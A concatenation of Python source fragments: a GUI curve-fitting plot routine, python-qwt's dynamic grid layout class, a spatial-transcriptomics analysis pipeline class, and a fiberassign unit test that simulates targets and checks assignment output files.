symbol='o', pen=colors[0], symbolBrush=colors[1], symbolPen='w', symbolSize=8)
# Add titles and units
ui_analysis.graph.setTitle(title=ui_analysis.load_pages.lineEdit_analysis_main_title.text())
ui_analysis.graph.setLabel('left', ui_analysis.load_pages.lineEdit_analysis_x_title.text(),
units=ui_analysis.load_pages.lineEdit_analysis_x_units.text())
ui_analysis.graph.setLabel('bottom', ui_analysis.load_pages.lineEdit_analysis_y_title.text(),
units=ui_analysis.load_pages.lineEdit_analysis_y_units.text())
def plot_opt_func(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
colors = get_graph_colors(ui_analysis)
x = analysis.fit.get_x_array()
function = analysis.fit.get_function()
func_x = np.linspace(x[0], x[-1], 10000)
params = analysis.fit.get_params_array()
y_fit = function(func_x, *params)
ind = ui_analysis.load_pages.comboBox_analysis_fit_function.currentIndex()
ui_analysis.graph.plot(func_x, y_fit, pen=colors[0], name=analysis.fun_texts.fun_non_latex_texts_array[ind])
def plot_opt_func_with_uncertainties(opt: Minuit, analysis: Analysis, ui_analysis: UI_AnalysisWindow):
colors = get_graph_colors(ui_analysis)
x = analysis.fit.get_x_array()
function = analysis.fit.get_function()
par_values = analysis.fit.get_params_array()
func_x = np.linspace(x[0], x[-1], 10000) # 10000 linearly spaced numbers
y_fit = function(func_x, *par_values)
ui_analysis.graph.plot(func_x, y_fit, pen=colors[0]) # plot the function over 10k points covering the x axis
def matplotlib_fit_analysis_data(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
pages = ui_analysis.load_pages
x = analysis.fit.get_x_array()
y = analysis.fit.get_y_array()
dx = analysis.fit.get_dx_array()
dy = analysis.fit.get_dy_array()
text = "$ Fitted \ to \ f(x) = {} $\n".format(analysis.fun_texts.fun_latex_texts_array[ui_analysis.load_pages.
comboBox_analysis_fit_function.currentIndex()])
ascii_prm = 97
for i in range(analysis.fit.get_func_par_num()):
text += "$\ \ \ %s$ = %0.4f $\pm$ %0.4f \n" % (
chr(ascii_prm + i), analysis.fit.get_params_array()[i], analysis.fit.get_err_array()[i])
text = text + "$\dfrac{{\chi}^2}{N_{dof}} = %0.4f(%0.4f/%d)$\n" % (
analysis.fit.get_chi_ndof(), analysis.fit.get_chi_ndof() * len(x),
len(x))
func_x = np.linspace(x[0], x[-1], 10000) # 10000 linearly spaced numbers
function = analysis.fit.get_function()
par_values = analysis.fit.get_params_array()
y_fit = function(func_x, *par_values)
| |
<filename>Lib/site-packages/qwt/dyngrid_layout.py<gh_stars>0
# -*- coding: utf-8 -*-
#
# Licensed under the terms of the Qwt License
# Copyright (c) 2002 <NAME>, for the original C++ code
# Copyright (c) 2015 <NAME>, for the Python translation/optimization
# (see LICENSE file for more details)
"""
qwt.dyngrid_layout
------------------
The `dyngrid_layout` module provides the `QwtDynGridLayout` class.
.. autoclass:: QwtDynGridLayout
:members:
"""
from qtpy.QtWidgets import QLayout
from qtpy.QtCore import Qt, QRect, QSize
class QwtDynGridLayout_PrivateData(object):
def __init__(self):
self.isDirty = True
self.maxColumns = 0
self.numRows = 0
self.numColumns = 0
self.expanding = Qt.Orientations()
self.itemSizeHints = []
self.itemList = []
def updateLayoutCache(self):
self.itemSizeHints = [it.sizeHint() for it in self.itemList]
self.isDirty = False
class QwtDynGridLayout(QLayout):
"""
The `QwtDynGridLayout` class lays out widgets in a grid,
adjusting the number of columns and rows to the current size.
`QwtDynGridLayout` takes the space it gets, divides it up into rows and
columns, and puts each of the widgets it manages into the correct cell(s).
It lays out as many number of columns as possible (limited by
:py:meth:`maxColumns()`).
.. py:class:: QwtDynGridLayout(parent, margin, [spacing=-1])
:param QWidget parent: parent widget
:param int margin: margin
:param int spacing: spacing
.. py:class:: QwtDynGridLayout(spacing)
:noindex:
:param int spacing: spacing
.. py:class:: QwtDynGridLayout()
:noindex:
Initialize the layout with default values.
:param int spacing: spacing
"""
def __init__(self, *args):
self.__data = None
parent = None
margin = 0
spacing = -1
if len(args) in (2, 3):
parent, margin = args[:2]
if len(args) == 3:
spacing = args[-1]
elif len(args) == 1:
if isinstance(args[0], int):
(spacing,) = args
else:
(parent,) = args
elif len(args) != 0:
raise TypeError(
"%s() takes 0, 1, 2 or 3 argument(s) (%s given)"
% (self.__class__.__name__, len(args))
)
QLayout.__init__(self, parent)
self.__data = QwtDynGridLayout_PrivateData()
self.setSpacing(spacing)
self.setContentsMargins(margin, margin, margin, margin)
def invalidate(self):
"""Invalidate all internal caches"""
self.__data.isDirty = True
QLayout.invalidate(self)
def setMaxColumns(self, maxColumns):
"""Limit the number of columns"""
self.__data.maxColumns = maxColumns
def maxColumns(self):
"""Return the upper limit for the number of columns"""
return self.__data.maxColumns
def addItem(self, item):
"""Add an item to the next free position"""
self.__data.itemList.append(item)
self.invalidate()
def isEmpty(self):
"""Return true if this layout is empty"""
return self.count() == 0
def itemCount(self):
"""Return number of layout items"""
return self.count()
def itemAt(self, index):
"""Find the item at a specific index"""
if index < 0 or index >= len(self.__data.itemList):
return
return self.__data.itemList[index]
def takeAt(self, index):
"""Find the item at a specific index and remove it from the layout"""
if index < 0 or index >= len(self.__data.itemList):
return
self.__data.isDirty = True
return self.__data.itemList.pop(index)
def count(self):
"""Return Number of items in the layout"""
return len(self.__data.itemList)
def setExpandingDirections(self, expanding):
"""
Set whether this layout can make use of more space than sizeHint().
A value of Qt.Vertical or Qt.Horizontal means that it wants to grow in
only one dimension, while Qt.Vertical | Qt.Horizontal means that it
wants to grow in both dimensions. The default value is 0.
"""
self.__data.expanding = expanding
def expandingDirections(self):
"""
Returns whether this layout can make use of more space than sizeHint().
A value of Qt.Vertical or Qt.Horizontal means that it wants to grow in
only one dimension, while Qt.Vertical | Qt.Horizontal means that it
wants to grow in both dimensions.
"""
return self.__data.expanding
def setGeometry(self, rect):
"""
Reorganizes columns and rows and resizes managed items within a
rectangle.
"""
QLayout.setGeometry(self, rect)
if self.isEmpty():
return
self.__data.numColumns = self.columnsForWidth(rect.width())
self.__data.numRows = self.itemCount() / self.__data.numColumns
if self.itemCount() % self.__data.numColumns:
self.__data.numRows += 1
itemGeometries = self.layoutItems(rect, self.__data.numColumns)
for it, geo in zip(self.__data.itemList, itemGeometries):
it.setGeometry(geo)
def columnsForWidth(self, width):
"""
Calculate the number of columns for a given width.
The calculation tries to use as many columns as possible
( limited by maxColumns() )
"""
if self.isEmpty():
return 0
maxColumns = self.itemCount()
if self.__data.maxColumns > 0:
maxColumns = min([self.__data.maxColumns, maxColumns])
if self.maxRowWidth(maxColumns) <= width:
return maxColumns
for numColumns in range(2, maxColumns + 1):
rowWidth = self.maxRowWidth(numColumns)
if rowWidth > width:
return numColumns - 1
return 1
def maxRowWidth(self, numColumns):
"""Calculate the width of a layout for a given number of columns."""
colWidth = [0] * numColumns
if self.__data.isDirty:
self.__data.updateLayoutCache()
for index, hint in enumerate(self.__data.itemSizeHints):
col = index % numColumns
colWidth[col] = max([colWidth[col], hint.width()])
margins = self.contentsMargins()
margin_w = margins.left() + margins.right()
return margin_w + (numColumns - 1) * self.spacing() + sum(colWidth)
def maxItemWidth(self):
"""Return the maximum width of all layout items"""
if self.isEmpty():
return 0
if self.__data.isDirty:
self.__data.updateLayoutCache()
return max([hint.width() for hint in self.__data.itemSizeHints])
def layoutItems(self, rect, numColumns):
"""
Calculate the geometries of the layout items for a layout
with numColumns columns and a given rectangle.
"""
itemGeometries = []
if numColumns == 0 or self.isEmpty():
return itemGeometries
numRows = int(self.itemCount() / numColumns)
if numColumns % self.itemCount():
numRows += 1
if numRows == 0:
return itemGeometries
rowHeight = [0] * numRows
colWidth = [0] * numColumns
self.layoutGrid(numColumns, rowHeight, colWidth)
expandH = self.expandingDirections() & Qt.Horizontal
expandV = self.expandingDirections() & Qt.Vertical
if expandH or expandV:
self.stretchGrid(rect, numColumns, rowHeight, colWidth)
maxColumns = self.__data.maxColumns
self.__data.maxColumns = numColumns
alignedRect = self.alignmentRect(rect)
self.__data.maxColumns = maxColumns
xOffset = 0 if expandH else alignedRect.x()
yOffset = 0 if expandV else alignedRect.y()
colX = [0] * numColumns
rowY = [0] * numRows
xySpace = self.spacing()
margins = self.contentsMargins()
rowY[0] = yOffset + margins.bottom()
for r in range(1, numRows):
rowY[r] = rowY[r - 1] + rowHeight[r - 1] + xySpace
colX[0] = xOffset + margins.left()
for c in range(1, numColumns):
colX[c] = colX[c - 1] + colWidth[c - 1] + xySpace
itemCount = len(self.__data.itemList)
for i in range(itemCount):
row = int(i / numColumns)
col = i % numColumns
itemGeometry = QRect(colX[col], rowY[row], colWidth[col], rowHeight[row])
itemGeometries.append(itemGeometry)
return itemGeometries
def layoutGrid(self, numColumns, rowHeight, colWidth):
"""
Calculate the dimensions for the columns and rows for a grid
of numColumns columns.
"""
if numColumns <= 0:
return
if self.__data.isDirty:
self.__data.updateLayoutCache()
for index in range(len(self.__data.itemSizeHints)):
row = int(index / numColumns)
col = index % numColumns
size = self.__data.itemSizeHints[index]
if col == 0:
rowHeight[row] = size.height()
else:
rowHeight[row] = max([rowHeight[row], size.height()])
if row == 0:
colWidth[col] = size.width()
else:
colWidth[col] = max([colWidth[col], size.width()])
def hasHeightForWidth(self):
"""Return true: QwtDynGridLayout implements heightForWidth()."""
return True
def heightForWidth(self, width):
"""Return The preferred height for this layout, given a width."""
if self.isEmpty():
return 0
numColumns = self.columnsForWidth(width)
numRows = int(self.itemCount() / numColumns)
if self.itemCount() % numColumns:
numRows += 1
rowHeight = [0] * numRows
colWidth = [0] * numColumns
self.layoutGrid(numColumns, rowHeight, colWidth)
margins = self.contentsMargins()
margin_h = margins.top() + margins.bottom()
return margin_h + (numRows - 1) * self.spacing() + sum(rowHeight)
def stretchGrid(self, rect, numColumns, rowHeight, colWidth):
"""
Stretch columns in case of expanding() & QSizePolicy::Horizontal and
rows in case of expanding() & QSizePolicy::Vertical to fill the entire
rect. Rows and columns are stretched with the same factor.
"""
if numColumns == 0 or self.isEmpty():
return
expandH = self.expandingDirections() & Qt.Horizontal
expandV = self.expandingDirections() & Qt.Vertical
if expandH:
xDelta = (
rect.width() - 2 * self.margin() - (numColumns - 1) * self.spacing()
)
for col in range(numColumns):
xDelta -= colWidth[col]
if xDelta > 0:
for col in range(numColumns):
space = xDelta / (numColumns - col)
colWidth[col] += space
xDelta -= space
if expandV:
numRows = self.itemCount() / numColumns
if self.itemCount() % numColumns:
numRows += 1
yDelta = rect.height() - 2 * self.margin() - (numRows - 1) * self.spacing()
for row in range(numRows):
yDelta -= rowHeight[row]
if yDelta > 0:
for row in range(numRows):
space = yDelta / (numRows - row)
rowHeight[row] += space
yDelta -= space
def sizeHint(self):
"""
Return the size hint. If maxColumns() > 0 it is the size for
a grid with maxColumns() columns, otherwise it is the size for
a grid with only one row.
"""
if self.isEmpty():
return QSize()
numColumns = self.itemCount()
if self.__data.maxColumns > 0:
numColumns = min([self.__data.maxColumns, numColumns])
numRows = int(self.itemCount() / numColumns)
if self.itemCount() % numColumns:
numRows += 1
rowHeight = [0] * numRows
colWidth = [0] * numColumns
self.layoutGrid(numColumns, rowHeight, colWidth)
margins = self.contentsMargins()
margin_h = margins.top() + margins.bottom()
margin_w = margins.left() + margins.right()
h = margin_h + (numRows - 1) * | |
#!/usr/bin/env python3
# coding: utf-8
"""
@file: st_pipeline.py
@description:
@author: <NAME>
@email: <EMAIL>
@last modified by: <NAME>
change log:
2021/07/20 create file.
"""
from ..preprocess.qc import cal_qc
from ..preprocess.filter import filter_cells, filter_genes, filter_coordinates
from ..algorithm.normalization import normalize_total, quantile_norm, zscore_disksmooth
import numpy as np
from scipy.sparse import issparse
from ..algorithm.dim_reduce import pca, u_map
from typing import Optional, Union
import copy
from ..algorithm.neighbors import find_neighbors
import phenograph as phe
import pandas as pd
from ..algorithm.leiden import leiden as le
from ..algorithm._louvain import louvain as lo
from typing_extensions import Literal
from ..log_manager import logger
def logit(func):
def wrapped(*args, **kwargs):
logger.info('start to run {}...'.format(func.__name__))
res = func(*args, **kwargs)
logger.info('{} end.'.format(func.__name__))
return res
return wrapped
class StPipeline(object):
def __init__(self, data):
"""
A analysis tool sets for StereoExpData. include preprocess, filter, cluster, plot and so on.
:param data: StereoExpData object.
"""
self.data = data
self.result = dict()
self._raw = None
self.key_record = {'hvg': [], 'pca': [], 'neighbors': [], 'umap': [], 'cluster': [], 'marker_genes': []}
@property
def raw(self):
"""
get the StereoExpData whose exp_matrix is raw count.
:return:
"""
return self._raw
@raw.setter
def raw(self, value):
"""
set the raw data.
:param value: StereoExpData.
:return:
"""
self._raw = copy.deepcopy(value)
def reset_raw_data(self):
"""
reset the self.data to the raw data.
:return:
"""
self.data = self.raw
def raw_checkpoint(self):
self.raw = self.data
def reset_key_record(self, key, res_key):
"""
reset key and coordinated res_key in key_record.
:param key:
:param res_key:
:return:
"""
if key in self.key_record.keys():
if res_key in self.key_record[key]:
self.key_record[key].remove(res_key)
self.key_record[key].append(res_key)
else:
self.key_record[key] = [res_key]
@logit
def cal_qc(self):
"""
calculate three qc index including the number of genes expressed in the count matrix, the total counts per cell
and the percentage of counts in mitochondrial genes.
:return:
"""
cal_qc(self.data)
@logit
def filter_cells(self, min_gene=None, max_gene=None, min_n_genes_by_counts=None, max_n_genes_by_counts=None,
pct_counts_mt=None, cell_list=None, inplace=True):
"""
filter cells based on numbers of genes expressed.
:param min_gene: Minimum number of genes expressed for a cell pass filtering.
:param max_gene: Maximum number of genes expressed for a cell pass filtering.
:param min_n_genes_by_counts: Minimum number of n_genes_by_counts for a cell pass filtering.
:param max_n_genes_by_counts: Maximum number of n_genes_by_counts for a cell pass filtering.
:param pct_counts_mt: Maximum number of pct_counts_mt for a cell pass filtering.
:param cell_list: the list of cells which will be filtered.
:param inplace: whether inplace the original data or return a new data.
:return:
"""
data = filter_cells(self.data, min_gene, max_gene, min_n_genes_by_counts, max_n_genes_by_counts, pct_counts_mt,
cell_list, inplace)
return data
@logit
def filter_genes(self, min_cell=None, max_cell=None, gene_list=None, inplace=True):
"""
filter genes based on the numbers of cells.
:param min_cell: Minimum number of cells for a gene pass filtering.
:param max_cell: Maximun number of cells for a gene pass filtering.
:param gene_list: the list of genes which will be filtered.
:param inplace: whether inplace the original data or return a new data.
:return:
"""
data = filter_genes(self.data, min_cell, max_cell, gene_list, inplace)
return data
@logit
def filter_coordinates(self, min_x=None, max_x=None, min_y=None, max_y=None, inplace=True):
"""
filter cells based on the coordinates of cells.
:param min_x: Minimum of x for a cell pass filtering.
:param max_x: Maximum of x for a cell pass filtering.
:param min_y: Minimum of y for a cell pass filtering.
:param max_y: Maximum of y for a cell pass filtering.
:param inplace: whether inplace the original data or return a new data.
:return:
"""
data = filter_coordinates(self.data, min_x, max_x, min_y, max_y, inplace)
return data
@logit
def log1p(self, inplace=True, res_key='log1p'):
"""
log1p for express matrix.
:param inplace: whether inplace the original data or get a new express matrix after log1p.
:param res_key: the key for getting the result from the self.result.
:return:
"""
if inplace:
self.data.exp_matrix = np.log1p(self.data.exp_matrix)
else:
self.result[res_key] = np.log1p(self.data.exp_matrix)
@logit
def normalize_total(self, target_sum=10000, inplace=True, res_key='normalize_total'):
"""
total count normalize the data to `target_sum` reads per cell, so that counts become comparable among cells.
:param target_sum: the number of reads per cell after normalization.
:param inplace: whether inplace the original data or get a new express matrix after normalize_total.
:param res_key: the key for getting the result from the self.result.
:return:
"""
if inplace:
self.data.exp_matrix = normalize_total(self.data.exp_matrix, target_sum=target_sum)
else:
self.result[res_key] = normalize_total(self.data.exp_matrix, target_sum=target_sum)
@logit
def quantile(self, inplace=True, res_key='quantile'):
"""
Normalize the columns of X to each have the same distribution. Given an expression matrix of M genes by N
samples, quantile normalization ensures all samples have the same spread of data (by construction).
:param inplace: whether inplace the original data or get a new express matrix after quantile.
:param res_key: the key for getting the result from the self.result.
:return:
"""
if issparse(self.data.exp_matrix):
self.data.exp_matrix = self.data.exp_matrix.toarray()
if inplace:
self.data.exp_matrix = quantile_norm(self.data.exp_matrix)
else:
self.result[res_key] = quantile_norm(self.data.exp_matrix)
@logit
def disksmooth_zscore(self, r=20, inplace=True, res_key='disksmooth_zscore'):
"""
for each position, given a radius, calculate the z-score within this circle as final normalized value.
:param r: radius for normalization.
:param inplace: whether inplace the original data or get a new express matrix after disksmooth_zscore.
:param res_key: the key for getting the result from the self.result.
:return:
"""
if issparse(self.data.exp_matrix):
self.data.exp_matrix = self.data.exp_matrix.toarray()
if inplace:
self.data.exp_matrix = zscore_disksmooth(self.data.exp_matrix, self.data.position, r)
else:
self.result[res_key] = zscore_disksmooth(self.data.exp_matrix, self.data.position, r)
@logit
def sctransform(self,
method="theta_ml",
n_cells=5000,
n_genes=2000,
filter_hvgs=False,
res_clip_range="seurat",
var_features_n=3000,
inplace=True,
res_key='sctransform'):
"""
scTransform reference Seruat.
:param method: offset, theta_ml, theta_lbfgs, alpha_lbfgs.
:param n_cells: Number of cells to use for estimating parameters in Step1: default is 5000.
:param n_genes: Number of genes to use for estimating parameters in Step1; default is 2000.
:param filter_hvgs: bool.
:param res_clip_range: string or list
options: 1)"seurat": Clips residuals to -sqrt(ncells/30), sqrt(ncells/30)
2)"default": Clips residuals to -sqrt(ncells), sqrt(ncells)
only used when filter_hvgs is true.
:param var_features_n: Number of variable features to select (for calculating a subset of pearson residuals).
:param inplace: whether inplace the original data or get a new express matrix after sctransform.
:param res_key: the key for getting the result from the self.result.
:return:
"""
from ..preprocess.sc_transform import sc_transform
if inplace:
self.result[res_key] = sc_transform(self.data, method, n_cells, n_genes, filter_hvgs,
res_clip_range, var_features_n)
else:
import copy
data = copy.deepcopy(self.data)
self.result[res_key] = sc_transform(data, method, n_cells, n_genes, filter_hvgs,
res_clip_range, var_features_n)
key = 'sct'
self.reset_key_record(key, res_key)
@logit
def highly_variable_genes(self,
groups=None,
method: Optional[str] = 'seurat',
n_top_genes: Optional[int] = 2000,
min_disp: Optional[float] = 0.5,
max_disp: Optional[float] = np.inf,
min_mean: Optional[float] = 0.0125,
max_mean: Optional[float] = 3,
span: Optional[float] = 0.3,
n_bins: int = 20, res_key='highly_variable_genes'):
"""
Annotate highly variable genes. reference scanpy.
:param groups: If specified, highly-variable genes are selected within each batch separately and merged.
This simple process avoids the selection of batch-specific genes and acts as a
lightweight batch correction method. For all flavors, genes are first sorted
by how many batches they are a HVG. For dispersion-based flavors ties are broken
by normalized dispersion. If `flavor = 'seurat_v3'`, ties are broken by the median
(across batches) rank based on within-batch normalized variance.
:param method: Choose the flavor for identifying highly variable genes. For the dispersion
based methods in their default workflows, Seurat passes the cutoffs whereas
Cell Ranger passes `n_top_genes`.
:param n_top_genes: Number of highly-variable genes to keep. Mandatory if `flavor='seurat_v3'`.
:param min_disp: If `n_top_genes` unequals `None`, this and all other cutoffs for the means and the
normalized dispersions are ignored. Ignored if `flavor='seurat_v3'`.
:param max_disp: If `n_top_genes` unequals `None`, this and all other cutoffs for the means and the
normalized dispersions are ignored. Ignored if `flavor='seurat_v3'`.
:param min_mean: If `n_top_genes` unequals `None`, this and all other cutoffs for the means and the
normalized dispersions are ignored. Ignored if `flavor='seurat_v3'`.
:param max_mean: If `n_top_genes` unequals `None`, this and all other cutoffs for the means and the
normalized dispersions are ignored. Ignored if `flavor='seurat_v3'`.
:param span: The fraction of the data (cells) used when estimating the variance in the loess
model fit if `flavor='seurat_v3'`.
:param n_bins: Number of bins for binning the mean gene expression. Normalization is
done with respect to each bin. If just a single gene falls into a bin,
the normalized dispersion is artificially set to 1. You'll be informed
about this if you set `settings.verbosity = 4`.
:param res_key: the key for getting the result from the self.result.
:return:
"""
from ..tools.highly_variable_genes import HighlyVariableGenes
| |
<filename>py/fiberassign/test/test_assign.py
"""
Test fiberassign target operations.
"""
import os
import shutil
import unittest
from datetime import datetime
import json
import numpy as np
import fitsio
import desimodel
from fiberassign.utils import option_list, GlobalTimers
from fiberassign.hardware import load_hardware
from fiberassign.tiles import load_tiles, Tiles
from fiberassign.targets import (TARGET_TYPE_SCIENCE, TARGET_TYPE_SKY,
TARGET_TYPE_SUPPSKY,
TARGET_TYPE_STANDARD, TARGET_TYPE_SAFE,
Targets, TargetsAvailable, TargetTree,
LocationsAvailable, load_target_file)
from fiberassign.assign import (Assignment, write_assignment_fits,
write_assignment_ascii, merge_results,
read_assignment_fits_tile, run)
from fiberassign.stucksky import stuck_on_sky
from fiberassign.qa import qa_tiles
from fiberassign.vis import plot_tiles, plot_qa
from fiberassign.scripts.assign import parse_assign, run_assign_full
from fiberassign.scripts.plot import parse_plot, run_plot
from fiberassign.scripts.qa import parse_qa, run_qa
from fiberassign.scripts.qa_plot import parse_plot_qa, run_plot_qa
from .simulate import (test_subdir_create, sim_tiles, sim_targets,
sim_focalplane, petal_rotation, test_assign_date,
sim_stuck_sky)
class TestAssign(unittest.TestCase):
def setUp(self):
self.saved_skybricks = os.environ.get('STUCKSKY_DIR')
if self.saved_skybricks is not None:
del os.environ['SKYBRICKS_DIR']
self.density_science = 5000
self.density_standards = 5000
self.density_sky = 100
self.density_suppsky = 5000
pass
def tearDown(self):
if self.saved_skybricks is not None:
os.environ['STUCKSKY_DIR'] = self.saved_skybricks
def test_io(self):
np.random.seed(123456789)
test_dir = test_subdir_create("assign_test_io")
input_mtl = os.path.join(test_dir, "mtl.fits")
input_std = os.path.join(test_dir, "standards.fits")
input_sky = os.path.join(test_dir, "sky.fits")
input_suppsky = os.path.join(test_dir, "suppsky.fits")
tgoff = 0
nscience = sim_targets(
input_mtl,
TARGET_TYPE_SCIENCE,
tgoff,
density=self.density_science
)
tgoff += nscience
nstd = sim_targets(
input_std,
TARGET_TYPE_STANDARD,
tgoff,
density=self.density_standards
)
tgoff += nstd
nsky = sim_targets(
input_sky,
TARGET_TYPE_SKY,
tgoff,
density=self.density_sky
)
tgoff += nsky
nsuppsky = sim_targets(
input_suppsky,
TARGET_TYPE_SUPPSKY,
tgoff,
density=self.density_suppsky
)
tgs = Targets()
load_target_file(tgs, input_mtl)
load_target_file(tgs, input_std)
load_target_file(tgs, input_sky)
load_target_file(tgs, input_suppsky)
# Create a hierarchical triangle mesh lookup of the targets positions
tree = TargetTree(tgs, 0.01)
# Compute the targets available to each fiber for each tile.
fp, exclude, state = sim_focalplane(rundate=test_assign_date)
hw = load_hardware(focalplane=(fp, exclude, state))
tfile = os.path.join(test_dir, "footprint.fits")
sim_tiles(tfile)
tiles = load_tiles(tiles_file=tfile)
tgsavail = TargetsAvailable(hw, tgs, tiles, tree)
# Free the tree
del tree
# Compute the fibers on all tiles available for each target
favail = LocationsAvailable(tgsavail)
# Pass empty map of STUCK positioners that land on good sky
stucksky = {}
# First pass assignment
asgn = Assignment(tgs, tgsavail, favail, stucksky)
asgn.assign_unused(TARGET_TYPE_SCIENCE)
# Write out, merge, read back in and verify
write_assignment_ascii(tiles, asgn, out_dir=test_dir,
out_prefix="test_io_ascii_")
write_assignment_fits(tiles, asgn, out_dir=test_dir,
out_prefix="basic_", all_targets=False)
write_assignment_fits(tiles, asgn, out_dir=test_dir,
out_prefix="full_", all_targets=True)
plotpetals = [0]
# plotpetals = None
plot_tiles(hw, tiles, result_dir=test_dir,
result_prefix="basic_", plot_dir=test_dir,
plot_prefix="basic_",
result_split_dir=False, petals=plotpetals,
serial=True)
plot_tiles(hw, tiles, result_dir=test_dir,
result_prefix="full_", plot_dir=test_dir,
plot_prefix="full_",
result_split_dir=False, petals=plotpetals,
serial=True)
target_files = [
input_mtl,
input_sky,
input_std
]
tile_ids = list(tiles.id)
merge_results(target_files, list(), tile_ids, result_dir=test_dir,
result_prefix="basic_", out_dir=test_dir,
out_prefix="basic_tile-", copy_fba=False)
merge_results(target_files, list(), tile_ids, result_dir=test_dir,
result_prefix="full_", out_dir=test_dir,
out_prefix="full_tile-", copy_fba=False)
# Here we test reading with the standard reading function
for tid in tile_ids:
tdata = asgn.tile_location_target(tid)
avail = tgsavail.tile_data(tid)
# Check basic format
infile = os.path.join(test_dir,
"basic_tile-{:06d}.fits".format(tid))
inhead, fiber_data, targets_data, avail_data, gfa_targets = \
read_assignment_fits_tile((tid, infile))
for lid, tgid, tgra, tgdec in zip(
fiber_data["LOCATION"],
fiber_data["TARGETID"],
fiber_data["TARGET_RA"],
fiber_data["TARGET_DEC"]):
if tgid >= 0:
self.assertEqual(tgid, tdata[lid])
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
# Check full format
infile = os.path.join(test_dir,
"full_tile-{:06d}.fits".format(tid))
inhead, fiber_data, targets_data, avail_data, gfa_targets = \
read_assignment_fits_tile((tid, infile))
for lid, tgid, tgra, tgdec in zip(
fiber_data["LOCATION"],
fiber_data["TARGETID"],
fiber_data["TARGET_RA"],
fiber_data["TARGET_DEC"]):
if tgid >= 0:
self.assertEqual(tgid, tdata[lid])
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
# Now read the files directly with fitsio and verify against the input
# target data.
for tid in tile_ids:
tdata = asgn.tile_location_target(tid)
avail = tgsavail.tile_data(tid)
# Check basic format
infile = os.path.join(test_dir,
"basic_tile-{:06d}.fits".format(tid))
fdata = fitsio.FITS(infile, "r")
fassign = fdata["FIBERASSIGN"].read()
ftargets = fdata["TARGETS"].read()
for lid, tgid, tgra, tgdec, tgsub, tgprior, tgobs in zip(
fassign["LOCATION"],
fassign["TARGETID"],
fassign["TARGET_RA"],
fassign["TARGET_DEC"],
fassign["SUBPRIORITY"],
fassign["PRIORITY"],
fassign["OBSCONDITIONS"]):
if tgid >= 0:
self.assertEqual(tgid, tdata[lid])
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
self.assertEqual(tgsub, props.subpriority)
self.assertEqual(tgprior, props.priority)
self.assertEqual(tgobs, props.obscond)
for tgid, tgra, tgdec, tgsub, tgprior, tgobs in zip(
ftargets["TARGETID"],
ftargets["RA"],
ftargets["DEC"],
ftargets["SUBPRIORITY"],
ftargets["PRIORITY"],
ftargets["OBSCONDITIONS"]):
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
self.assertEqual(tgsub, props.subpriority)
self.assertEqual(tgprior, props.priority)
self.assertEqual(tgobs, props.obscond)
# Check full format
infile = os.path.join(test_dir,
"full_tile-{:06d}.fits".format(tid))
fdata = fitsio.FITS(infile, "r")
fassign = fdata["FIBERASSIGN"].read()
ftargets = fdata["TARGETS"].read()
for lid, tgid, tgra, tgdec, tgsub, tgprior, tgobs in zip(
fassign["LOCATION"],
fassign["TARGETID"],
fassign["TARGET_RA"],
fassign["TARGET_DEC"],
fassign["SUBPRIORITY"],
fassign["PRIORITY"],
fassign["OBSCONDITIONS"]):
if tgid >= 0:
self.assertEqual(tgid, tdata[lid])
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
self.assertEqual(tgsub, props.subpriority)
self.assertEqual(tgprior, props.priority)
self.assertEqual(tgobs, props.obscond)
for tgid, tgra, tgdec, tgsub, tgprior, tgobs in zip(
ftargets["TARGETID"],
ftargets["RA"],
ftargets["DEC"],
ftargets["SUBPRIORITY"],
ftargets["PRIORITY"],
ftargets["OBSCONDITIONS"]):
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
self.assertEqual(tgsub, props.subpriority)
self.assertEqual(tgprior, props.priority)
self.assertEqual(tgobs, props.obscond)
plot_tiles(hw, tiles, result_dir=test_dir,
result_prefix="basic_tile-", plot_dir=test_dir,
plot_prefix="basic_tile-",
result_split_dir=False, petals=plotpetals,
serial=True)
plot_tiles(hw, tiles, result_dir=test_dir,
result_prefix="full_tile-", plot_dir=test_dir,
plot_prefix="full_tile-",
result_split_dir=False, petals=plotpetals,
serial=True)
return
def test_stucksky(self):
return self.test_full(do_stucksky=True)
def test_full(self, do_stucksky=False):
test_dir = test_subdir_create("assign_test_full")
np.random.seed(123456789)
input_mtl = os.path.join(test_dir, "mtl.fits")
input_std = os.path.join(test_dir, "standards.fits")
input_sky = os.path.join(test_dir, "sky.fits")
input_suppsky = os.path.join(test_dir, "suppsky.fits")
tgoff = 0
nscience = sim_targets(
input_mtl,
TARGET_TYPE_SCIENCE,
tgoff,
density=self.density_science
)
tgoff += nscience
nstd = sim_targets(
input_std,
TARGET_TYPE_STANDARD,
tgoff,
density=self.density_standards
)
tgoff += nstd
nsky = sim_targets(
input_sky,
TARGET_TYPE_SKY,
tgoff,
density=self.density_sky
)
tgoff += nsky
nsuppsky = sim_targets(
input_suppsky,
TARGET_TYPE_SUPPSKY,
tgoff,
density=self.density_suppsky
)
tgs = Targets()
load_target_file(tgs, input_mtl)
load_target_file(tgs, input_std)
load_target_file(tgs, input_sky)
load_target_file(tgs, input_suppsky)
# Create a hierarchical triangle mesh lookup of the targets positions
tree = TargetTree(tgs, 0.01)
# Read hardware properties
fp, exclude, state = sim_focalplane(rundate=test_assign_date)
hw = load_hardware(focalplane=(fp, exclude, state))
tfile = os.path.join(test_dir, "footprint.fits")
sim_tiles(tfile)
tiles = load_tiles(tiles_file=tfile)
if do_stucksky:
sim_stuck_sky(test_dir, hw, tiles)
# Compute the targets available to each fiber for each tile.
tgsavail = TargetsAvailable(hw, tgs, tiles, tree)
# Free the tree
del tree
# Compute the fibers on all tiles available for each target
favail = LocationsAvailable(tgsavail)
# Pass empty map of STUCK positioners that land on good sky
stucksky = None
if do_stucksky:
stucksky = stuck_on_sky(hw, tiles)
if stucksky is None:
# (the pybind code doesn't like None when a dict is expected...)
stucksky = {}
# Create assignment object
asgn = Assignment(tgs, tgsavail, favail, stucksky)
run(asgn)
write_assignment_fits(tiles, asgn, out_dir=test_dir, all_targets=True,
stucksky=stucksky)
